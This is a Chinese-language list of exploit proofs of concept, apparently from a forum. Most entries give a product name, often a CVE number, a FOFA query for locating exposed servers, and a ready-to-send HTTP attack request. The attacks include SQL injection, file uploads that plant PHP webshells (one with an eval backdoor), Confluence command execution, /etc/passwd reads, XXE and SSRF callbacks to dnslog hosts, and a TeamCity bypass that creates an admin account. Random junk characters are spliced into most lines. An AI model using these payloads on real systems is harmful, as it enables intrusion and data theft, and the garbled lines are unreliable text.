0 t$ m5 v. G  O0 @先登录进入系统,默认账号密码为admin/admin" m( A/ t( N. Z4 @* C) Q& m
POST /sysmanage/sysmanageajax.php HTTP/1.11
% ~+ O% Y2 D& X4 B* Q7 f# UHost: x.x.x.x
+ n  P! B& E4 y" \! p& \7 P; ^Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee- }% b9 k9 ]: ~! a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0  [' D3 a4 n# m& P2 M% R4 _
Accept: */*% T/ ?& _0 Z, \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: T8 E4 J5 O+ }, }* U! C3 A" VAccept-Encoding: gzip, deflate
& G; {" T3 ~0 a& OContent-Type: application/x-www-form-urlencoded;2 F9 d' i5 K* k
Content-Length: 109
- n6 N% [% g- K# Y5 t8 D9 z; h3 wOrigin: https://58.18.133.60:8443
+ {) T2 e( g! k7 P9 n1 xReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php9 R: U" T& s+ y
Sec-Fetch-Dest: empty( S& z( O0 t* k5 D- Z, @
Sec-Fetch-Mode: cors
- j5 j5 w: [6 F: I* e1 QSec-Fetch-Site: same-origin
8 J8 r" q5 O: \9 u& TX-Forwarded-For: 1.1.1.1
7 [% Z& {* ~5 p1 e5 u6 AX-Originating-Ip: 1.1.1.1
8 D( |4 [, @( lX-Remote-Ip: 1.1.1.1, C* d; Z( `2 h' b  |% {4 N4 Z" E
X-Remote-Addr: 1.1.1.1# W& c: G# |/ b0 i$ l5 h
Te: trailers9 a% s  \# z6 M! W/ ~9 U
Connection: close# m8 ]/ h- A1 k: I- {6 t/ Q2 _
. T/ y- N& S& I! b: P
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
; V7 i* g3 x" ~& D7 N( T0 c9 Y# q$ U

: @4 J3 N* K1 C- r0 @- T  T120. 北京百绰智能S40管理平台导入web.php任意文件上传) M" S+ }( p6 h0 w; ]4 [
CVE-2024-1253- |. G! u$ D3 j- o0 x2 `2 |0 ^
FOFA:title="Smart管理平台"
( O4 C3 M8 t# |' s$ M* C- KPOST /useratte/web.php? HTTP/1.1
5 _/ I/ S+ b0 |5 X6 V, e" OHost: ip:port
: A& X$ ?, M2 `  c+ Q6 E; _" MCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db" p* B/ D: x" m$ P" W& M  S( b
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko" N. R% s. _4 h8 r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 ?: a% X) N: C. Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 _! I$ [' S  t/ H0 p4 x
Accept-Encoding: gzip, deflate
' Z) @( ]/ _, h  }# R  YContent-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793286 Z/ a9 J' ?" c* K; I
Content-Length: 597$ M0 }/ \0 v2 o. p1 F! Y+ G- u$ y
Origin: https://ip:port
! j7 S, S- x) j. @  qReferer: https://ip:port/sysmanage/licence.php3 x7 b' n" F& ^* l- S# V& V. H
Upgrade-Insecure-Requests: 16 L4 ], f8 C( |  Y7 Y; i, _+ d* J
Sec-Fetch-Dest: document( s" t+ n2 }  b
Sec-Fetch-Mode: navigate
/ ^' t3 [1 h% I3 z+ QSec-Fetch-Site: same-origin' O* \( B3 B$ H1 s4 H% @9 u1 g
Sec-Fetch-User: ?1
1 s0 S2 B1 O$ Q7 ~3 v# A4 B; [& vTe: trailers
# G% E+ P( r! Y8 @% n! Z* P# dConnection: close
  ?9 c3 i' b, k* O( g/ ^
3 i. ~4 t2 {/ }8 s6 i-----------------------------423289041236658752706300793283 o3 Q( [5 Q0 `  ^: K7 X
Content-Disposition: form-data; name="file_upload"; filename="2.php"
& G" Z4 |7 \, BContent-Type: application/octet-stream
0 L4 z8 s+ e9 B8 F9 ?9 r
$ e$ e- r5 C* ?<?php phpinfo()?>
7 I( A% h7 X5 b! R5 m; ?/ d7 ~# H-----------------------------42328904123665875270630079328+ w: S7 @7 X, d7 f* b# y; o& }
Content-Disposition: form-data; name="id_type"+ [7 W( M: Y+ ]" @
7 p  I1 V/ K* y. Y% `
1
% N8 B" {0 z8 N" d! ~  k-----------------------------42328904123665875270630079328
! w) D; t& R  O- z9 P# s/ z- vContent-Disposition: form-data; name="1_ck"
0 ]  v4 D+ w: G) O& C/ i
8 a! ]* d/ X. a9 @' e+ g' ]1_radhttp4 `) S2 K" _' m. B+ C/ f8 X" j
-----------------------------42328904123665875270630079328' ~2 o6 ^9 X1 I. O. T/ y
Content-Disposition: form-data; name="mode"
9 a! ]4 X5 u0 ^
; r2 |% K' x( j- fimport9 S8 O5 c  {5 |% {4 \5 n
-----------------------------42328904123665875270630079328
( n* {+ D5 }9 Y
+ d9 z+ k3 y# m6 i' m4 s+ d8 B$ C& n* t; @: U% A* `
文件路径/upload/2.php7 m( f9 p0 S1 q. K4 n( P

% T2 K' }$ y4 z" W+ i121. 北京百绰智能S42管理平台userattestation.php任意文件上传
7 q* h' C% [" e0 ~0 Y# ?2 V. rCVE-2024-1918$ N$ @1 }5 [/ r0 b0 _( [% Y4 r
FOFA:title="Smart管理平台"
' M7 M/ w3 r( l. _7 aPOST /useratte/userattestation.php HTTP/1.1
1 G- w, _* @0 c4 UHost: 192.168.40.130:8443
; [; j  U( J0 f  U. _Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac500 Q" n8 A4 z5 j) ~
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
4 J* x* L2 |  h1 Z+ RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! I. P6 E0 l) P+ qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' I3 {) I3 Q) q; G; }9 V4 AAccept-Encoding: gzip, deflate
: f& u" v- `1 j0 QContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
; U$ t4 s: u# Y; mContent-Length: 592
+ l1 H9 e. k+ o" ~8 q! G6 [Origin: https://192.168.40.130:8443
9 J* ]# A0 E" v, Y: Y0 z7 EUpgrade-Insecure-Requests: 1
% Q: V9 c9 y9 o/ wSec-Fetch-Dest: document
" x3 B7 d& R# n2 tSec-Fetch-Mode: navigate* \5 A2 W: e2 C5 H: Q4 r6 X5 N1 I" ^. Y
Sec-Fetch-Site: same-origin
- e, b' ?3 Z5 Z4 s( PSec-Fetch-User: ?1
4 k; N8 D" [# @5 ^* ~6 o7 gTe: trailers
! I$ i( G; z: E- ?3 i! ?Connection: close
9 b5 P' p7 O2 J5 x7 P1 c
8 H' D" `) Z* Y2 M! n-----------------------------42328904123665875270630079328
9 @( d- b( L( y/ T+ p/ E( i6 kContent-Disposition: form-data; name="web_img"; filename="1.php"% J4 X5 ^6 S; {7 z
Content-Type: application/octet-stream& R! ~% z1 y3 H' U
. u8 z- X* q' r4 U
<?php phpinfo();?>
4 w( W) T, o4 b& {: u6 j-----------------------------423289041236658752706300793286 |' y) P) Q* _* B; [" N0 z( y$ z
Content-Disposition: form-data; name="id_type"# |) t) ~4 z* Z
$ E( ^3 F+ f) W8 I' g# x$ R; N  ]
19 ?9 X+ `* c, {( p' o5 H" L+ G
-----------------------------423289041236658752706300793286 V( W. ?3 S7 r/ w
Content-Disposition: form-data; name="1_ck"
. @4 ^4 Z6 }  A! P
1 B% t& k9 u- i! @# o1_radhttp" ]6 h: F2 J  O
-----------------------------42328904123665875270630079328
' ?2 E) ?7 d  C; Y- a7 GContent-Disposition: form-data; name="hidwel", x4 V, n4 K* W, V2 Z0 j/ B

4 |4 B  G6 V3 X0 o$ ]set1 T; s9 ^0 {: b1 y5 E4 j
-----------------------------42328904123665875270630079328
6 i* m8 w4 n8 }
5 p: Q, n; `! |( i1 J
, d& `) C0 v; I0 ~) ^: ]boot/web/upload/weblogo/1.php
* r' b6 c, s9 z: T6 v/ L% o/ Q7 c8 }; e+ A: {
122. 北京百绰智能s200管理平台/importexport.php sql注入
2 ]9 b' Z: J: k" sCVE-2024-27718FOFA:title="Smart管理平台"& k7 d1 ~4 y, d$ Q/ ~8 ~! B
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
# t! K; J" ]2 D+ i- YGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1. Z0 L/ e* R$ S* P6 e, j4 q2 z) s7 Z
Host: x.x.x.x
$ q: t* ^$ I& j/ e9 ]Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
/ d2 g2 s7 W# ]& `4 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
! x. _: Y3 |# S+ ~7 _% \: X* JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. E, s: N* G! Z, K' L# r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. E0 N/ h: E( s3 P$ bAccept-Encoding: gzip, deflate, br0 R5 N8 \& \4 U2 r+ R; ]
Upgrade-Insecure-Requests: 15 s& O' L/ ?& x7 S8 E& u' [
Sec-Fetch-Dest: document" Z3 q+ x( j7 b: a; @+ N
Sec-Fetch-Mode: navigate/ Z1 `5 r# H3 e3 Z
Sec-Fetch-Site: none
0 B9 Z, T, ?, `Sec-Fetch-User: ?1
5 ~- I0 E! U0 HTe: trailers: j, j6 E  Q& k5 u( C$ y
Connection: close
( R( B! h% r: L) o% y, h: o5 E; x2 I
$ R/ O2 R( v- K8 e
123. Atlassian Confluence 模板注入代码执行
7 f8 `" c+ g4 u" l1 b/ [FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"+ x( V( u- K6 l9 V# t
POST /template/aui/text-inline.vm HTTP/1.1
# y4 n' ^; y7 l% A' a" gHost: localhost:8090$ P* i7 Y, V- `  k
Accept-Encoding: gzip, deflate, br) d+ Z4 U; I9 v3 N
Accept: */*1 {; w- S5 _' j, a
Accept-Language: en-US;q=0.9,en;q=0.8
3 U0 J) i3 T3 k& v# hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36  m2 c2 I6 q6 `# z& ]
Connection: close: s- k$ t- j5 X7 K4 h6 C
Content-Type: application/x-www-form-urlencoded7 a9 w" }3 w9 _& X6 ?

: A: Q& c0 v- c- Ulabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))* H; x. k- m6 ]% C

1 M/ I  B8 a. j" z  X+ X
9 ]" g5 }' `+ T1 X  k  ]5 y124. 湖南建研工程质量检测系统任意文件上传  S# y, @. m2 t, |
FOFA:body="/Content/Theme/Standard/webSite/login.css"
: W0 C# J$ }0 B5 H  F7 j+ FPOST /Scripts/admintool?type=updatefile HTTP/1.1
7 V- d+ _! _% U. d+ i7 F1 H9 yHost: 192.168.40.130:8282
3 Y' G. k/ ]0 @/ o$ mUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.360 f2 c8 f; Z- B: }- _' `1 c
Content-Length: 72& S: n: I8 A6 u8 w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
, l# L! @  X0 N2 F% W) |# K; D( nAccept-Encoding: gzip, deflate, br
( N9 ?3 r2 S  P$ q& TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; m5 `, U4 u  s2 |3 [4 q7 {4 ?+ @
Connection: close
& r* y$ ]& D# WContent-Type: application/x-www-form-urlencoded
+ F2 j% w* S3 R7 f! b6 {& s  a: ~8 {& j7 M
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>4 l8 ^: v- h- j  |

2 w1 n2 |0 H& J) ~+ ^8 m( F. [/ i
3 x7 N+ ~% J& Q8 I- d% I: |! Y( F% O3 \http://192.168.40.130:8282/Scripts/abcgcg.aspx
6 E8 ^9 s! z7 \, L( i1 @# d/ [+ [& i6 n
125. ConnectWise ScreenConnect身份验证绕过
# `6 q$ n6 Y* v' d$ n2 JCVE-2024-1709
3 t3 b+ b2 a; U) L# lFOFA:icon_hash="-82958153"% V7 f) E; R. k: j
https://github.com/watchtowrlabs ... bypass-add-user-poc' T/ l+ M9 {' _! |9 j2 q7 J
1 Y# V) Q; Z* v( h4 y  C4 O( N' X
- I* s, J) _" c3 r, m+ [5 V
使用方法
9 \- X. q9 r& [8 r. k- W4 Xpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
2 Y+ b3 `! W0 G. g' p/ [. k& W/ M2 a
# E1 ^/ i) Z* ^+ e9 J
创建好用户后直接登录后台,可以执行系统命令。9 _; B( D" v9 s5 c; W
, [7 J" a) w5 j( e4 m
126. Aiohttp 路径遍历# ]  q4 j4 s& c5 O6 M# x6 w) n3 h
FOFA:title=="ComfyUI"4 |( i( K" B- r4 i# U
GET /static/../../../../../etc/passwd HTTP/1.19 X/ }$ B# Z7 q
Host: x.x.x.x9 U. V7 ?. K  L+ v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
5 c* k5 m: c5 F" f; U: `1 O9 }3 _6 m" @Connection: close
5 b  b5 O& |: H1 @8 L. @Accept: */*
% c; C2 W, q* ]8 pAccept-Language: en0 p" k5 h0 z0 b7 |% n  i1 O
Accept-Encoding: gzip
) h2 H3 e9 s5 y% Z
# w. p4 q' ?3 f! Y% @$ a9 O% A: K! `+ n' I
127. 广联达Linkworks DataExchange.ashx XXE
. Y2 ]. c# r! J3 V7 j6 yFOFA:body="Services/Identification/login.ashx"
2 S5 w! u: a1 ^POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
" _" R# Y# w1 Q& H! cHost: 192.168.40.130:88887 o3 E+ E! }$ V  v! X  G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
+ r% |& \7 _' GContent-Length: 415) ^) Z  K+ A6 J3 W1 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* R0 _' y. l0 S; x
Accept-Encoding: gzip, deflate
3 [# X  L/ z; B- }2 \: w- @7 _Accept-Language: zh-CN,zh;q=0.9" \! w7 R. T. u- w
Connection: close
: x' E, D4 @/ r9 k3 i1 E3 `; {Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
6 {) Z# X8 v4 ~8 g& ]+ pPurpose: prefetch: E& ~, m. E2 u3 U
Sec-Purpose: prefetch;prerender$ N6 E) E1 C" d5 j8 ]& S# q
0 Z; D, R: G/ S- @9 l" }; `
------WebKitFormBoundaryJGgV5l5ta05yAIe0
  K. q& K& L9 V  zContent-Disposition: form-data;name="SystemName"% |1 b9 T* G' t# j" Q

5 ~% n1 L3 \+ {: c, rBIM! `7 o, |9 p" `- w) k! U
------WebKitFormBoundaryJGgV5l5ta05yAIe0- x- _1 A+ ^/ H" F* O0 ~/ i
Content-Disposition: form-data;name="Params"% Z6 C# N; p5 Y5 K% l
Content-Type: text/plain
5 m) k6 l# w5 z, _9 L, p
. E; B& K8 s* e' r& L9 ~( s<?xml version="1.0" encoding="UTF-8"?>2 S5 \$ C# c; D- v6 I
<!DOCTYPE test [
: ]+ G- q( K1 P<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">( C! b$ a6 |# U
]1 `" l! R! j* I. ?8 w5 y9 }0 f
>
* k: ?6 Z, q; ~8 g; c4 ^1 n8 ~<test>&t;</test>3 w/ S. A7 O; T
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
% O* s+ ]) i! u( P; P( Z" ~" K7 y$ p# h& S

& n2 q- {% ?. r- L& h  k' |' A) s+ u
128. Adobe ColdFusion 反序列化/ K: o5 X; X: _* p! q& c
CVE-2023-38203  x7 u& _3 D; {. K9 [% Z( s
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)# ^) W) t0 v/ J0 L
FOFA:app="Adobe-ColdFusion"  `4 _, ^6 K* w
PAYLOAD4 ~+ J2 C  N2 w" u

: o. Q- M5 E" X6 [4 w) c129. Adobe ColdFusion 任意文件读取
6 x" b2 d4 l8 x0 a: yCVE-2024-20767  K- K1 d3 Z( j1 c2 H# d
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
( ]( z7 O! m6 C0 A5 c1 J4 s% `第一步,获取uuid0 ^0 c/ N) g! @6 |# ?
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.11 b" ^/ I" f) w, D
Host: x.x.x.x
2 m+ _0 N1 m# S9 K( L" Q$ OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.364 J) V0 }+ I. |3 s% o2 r0 K
Accept: */*
) f) B- x$ k, V- f5 F* x9 kAccept-Encoding: gzip, deflate+ e2 Q. A9 \: S/ Z- [  j  y+ C
Connection: close
7 S' E- \. q, |; }
1 h9 d+ j# R* W1 [, O: F  L& J! v* ?0 N* s. l6 I( Q
第二步,读取/etc/passwd文件
9 e$ D/ l* a& S" pGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
2 J4 o6 \! C$ |$ d( q( T5 CHost: x.x.x.x
. ?5 ~& j$ [' Z. R! {6 yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
( e- Z2 p7 k9 n: Y" V% `Accept: */*
3 e% m) L1 ?+ F! V) S1 jAccept-Encoding: gzip, deflate4 s$ D/ m7 j7 V# K
Connection: close
8 l# D) ^1 [1 Y6 Ruuid: 85f60018-a654-4410-a783-f81cbd5000b9
; S* H5 g; `8 q6 w% ^# f. X- x- u/ p! [3 @) |3 Z9 P

8 v* i* o3 J  H% Z130. Laykefu客服系统任意文件上传0 Z3 ~( }/ ~. o, z: _
FOFA:icon_hash="-334624619"* @% P( L3 J, u! r+ F; U5 |
POST /admin/users/upavatar.html HTTP/1.1( F  X# V. p- o+ t* I2 C( j
Host: 127.0.0.1
0 `, S% s3 K* w, p% U$ W8 oAccept: application/json, text/javascript, */*; q=0.01
7 t8 v$ ~" h9 E, WX-Requested-With: XMLHttpRequest
. C  j/ c0 T  t. \  r. w, Q4 hUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26$ e: ^# l; h& L
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
$ n; t& u6 S; U  N' t% ?Accept-Encoding: gzip, deflate. \5 C' B) D, n% i. O* l
Accept-Language: zh-CN,zh;q=0.9! i0 P6 p: x. Z% T9 E1 D# i
Cookie: user_name=1; user_id=3
  X6 ?- N  c! v! d. I. @Connection: close
6 H; h1 P( w- t/ V! f( ?/ z1 V9 `: [+ H, I8 F$ j  g
------WebKitFormBoundary3OCVBiwBVsNuB2kR4 l1 {) Z% i9 _
Content-Disposition: form-data; name="file"; filename="1.php"; E5 R( w! X4 U/ o* M! s: M* w
Content-Type: image/png
' a" @% f! T( S: V# ` , _, Y, y9 \) m2 ~
<?php phpinfo();@eval($_POST['sec']);?>
0 w8 `5 q0 R3 n. J. K5 V0 h- \/ M------WebKitFormBoundary3OCVBiwBVsNuB2kR--
" e# o9 _. _$ }- k4 Q, y0 k- c+ B  Z& z' `4 t! W- H! N* H+ s

3 S5 w' l/ r9 g0 b131. Mini-Tmall <=20231017 SQL注入# ~8 f, _6 E" R" S) ~/ Q
FOFA:icon_hash="-2087517259") v8 o; a& [: ?: s6 d
后台地址:http://localhost:8080/tmall/admin) S# {( f4 e' N. i+ O" E7 }
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
9 R+ L& G- t% D6 U3 v3 S9 j: i* s9 ]3 C" C, x  l6 s
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
8 f2 A# I# L. t% b( S+ f" \CVE-2024-27198
2 f2 d8 z2 r. L5 B2 uFOFA:body="Log in to TeamCity") e, F- p' P6 u% |
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
5 ]5 G# H1 u+ O! V* M" F1 aHost: 192.168.40.130:81115 S$ F; a) L$ H+ U* A0 w% O1 _3 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.363 c4 S; V. y' l3 N6 c. C9 ^6 R
Accept: */*
! o& B$ E# X0 Z1 A* K+ }/ dContent-Type: application/json
  F4 E( K( S1 P1 q! H- \' c& uAccept-Encoding: gzip, deflate
" O$ [/ S- z. q4 W0 o& Y4 b- [" ~8 g3 j: W
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}. f6 b% K7 O6 O* W7 J6 H" w8 `8 L
& L7 h' r$ T! k, f& B$ Q' v
3 x6 V8 j9 ~) S% W
CVE-2024-27199
8 V( c3 x' [- Z" Y/res/../admin/diagnostic.jsp9 e, Z" h5 ~# w5 V' {
/.well-known/acme-challenge/../../admin/diagnostic.jsp
8 s. @. t+ T+ H0 O  T+ O6 g/update/../admin/diagnostic.jsp
" P$ ]5 C3 L# g, ^
( H- g8 h- F+ c. p6 X3 C0 A' q3 |4 h* S  u
CVE-2024-27198-RCE.py
* e  I% U9 f% y  q, B7 q5 w7 b! V' J, b
133. H5 云商城 file.php 文件上传
: `$ _" q4 ~! [FOFA:body="/public/qbsp.php"
4 [% ?* J1 T' W& MPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
! P# j# P, j% BHost: your-ip0 P4 r4 h6 G* C4 g4 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
5 R  r' Z  E  ^0 J8 ?  ~9 RContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx/ {% A/ I% o4 E, G; s* s
, s7 p6 \0 T; w- e3 d. |
------WebKitFormBoundaryFQqYtrIWb8iBxUCx* o% G/ ]5 d/ L8 l  {( m/ q7 z6 }
Content-Disposition: form-data; name="file"; filename="rce.php") U% y$ i- b: x4 W
Content-Type: application/octet-stream9 e- J5 N, _. N9 e& ]( }
" [& m/ X5 G8 w4 T8 _
<?php system("cat /etc/passwd");unlink(__FILE__);?>
: e' g& `* C  [% l8 S& I, ]. S------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
+ F0 V  h- H' d$ }6 c7 z
7 |. K" }' n0 ^4 }5 n/ F  q
- `' Y/ x$ v, [$ Z5 l
8 H) i) A' s; [) k7 Z9 g134. 网康NS-ASG应用安全网关index.php sql注入% M9 O5 D9 }' m4 @
CVE-2024-2330
! q7 ^+ A$ d: B; u: |. |Netentsec NS-ASG Application Security Gateway 6.3版本
$ d) I: e9 h- v) B# IFOFA:app="网康科技-NS-ASG安全网关"
  f/ R# m. m0 t# E5 E7 _POST /protocol/index.php HTTP/1.1
2 \+ g4 r+ a! z  g' qHost: x.x.x.x
0 c" J; k0 x! b5 w" aCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
+ T9 m% m2 Q, Y" c8 ?1 v0 vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
) Y9 O& C/ b- d- E6 EAccept: */*
  ^/ Y1 @* E8 E/ V9 z) V3 OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; Z+ `7 u/ @; b0 [/ ~
Accept-Encoding: gzip, deflate- V/ V6 y5 I9 h/ ~
Sec-Fetch-Dest: empty& F& f% \7 b( m" b. z% K
Sec-Fetch-Mode: cors" F& H9 V, P. L" O7 [; g! _
Sec-Fetch-Site: same-origin
4 O- A- {" v) R" X" r9 JTe: trailers
/ d+ `( V, Q1 A" y0 Y/ GConnection: close
  Q) a. q, i5 ?% LContent-Type: application/x-www-form-urlencoded; q" W* J* f2 v0 K
Content-Length: 263
6 a8 ]: r. \  i2 I& C  p5 ^8 r$ `, W3 {% e/ k
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}  D, Z3 w& L0 E3 w" ], P- h6 T: D

1 H0 L: _. `. x8 }& Y* E
2 k8 i  Y0 p; d& }/ b135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
4 [8 w; v0 Z( S! t: {5 }CVE-2024-2022* i# Y% ?* l( u# Y8 h
Netentsec NS-ASG Application Security Gateway 6.3版本
3 x  `! b" D7 D9 t" v% U* CFOFA:app="网康科技-NS-ASG安全网关"
4 m: a* a. E- K) Z5 b% QGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
& X! p+ x3 p% J, i5 LHost: x.x.x.x# ~5 ?; o7 D; B9 F2 E# c4 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; d# v+ u; g/ w4 |8 S6 P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 l' B# S+ P# K. i0 F; U
Accept-Encoding: gzip, deflate
) _: i) W* W2 ~Accept-Language: zh-CN,zh;q=0.9
# E! w2 B$ P4 O( r9 }# ?! ^Connection: close! M0 ?' ~0 S* v8 S2 g5 f7 x# C: ^' q9 M6 U

; k2 ]% S! ]7 D3 t1 G
% d" w  Z# S- ]/ k% E136. NextChat cors SSRF
* N5 y( p+ A0 C# F( {: aCVE-2023-49785$ F$ @$ w& z% T" ]
FOFA:title="NextChat"
- x" [$ |. w# d: zGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
  h; p& g8 p3 \% ?5 |" U2 H- I5 I% X! AHost: x.x.x.x:10000
) H" t# i; h: @) w* a. e5 t) sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36) U, m/ b3 {1 J4 W; v3 t, u$ I1 L
Connection: close: |% B$ D5 G; g0 b0 P; I1 s: c
Accept: */*
) M3 x8 j2 m" K  ?* }Accept-Language: en
% x6 `: \. b2 J" m% M* LAccept-Encoding: gzip
; R8 y' v! g. G8 i1 L$ e3 M) R8 f6 ]- E+ w2 C4 t
- D# ]' ]" [+ D9 ?0 R7 G
137. 福建科立迅通信指挥调度平台down_file.php sql注入( U0 H: t6 D# ]
CVE-2024-2620# y  y) z8 r' R9 q: |/ E; x
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
2 R% Q: `3 ?: T# AGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.13 `3 K! R  @, |- ~# S/ i5 ?
Host: x.x.x.x- T0 K/ `9 l3 x) @8 e) I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
: O5 t1 w+ S9 o- ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ P0 o' w( X" J. w& D- ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% T( m/ j; x" s5 w$ s' g' q) KAccept-Encoding: gzip, deflate, br. }2 W" q) P8 b; G) b# N6 K4 Y
Connection: close+ y- V/ r& z( ?( n: k
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj+ Y1 f( x7 }& R; \# ~' P
Upgrade-Insecure-Requests: 19 I! X' S, q+ x7 V2 q/ e# }& q
$ _6 d% G6 H2 m7 |& h
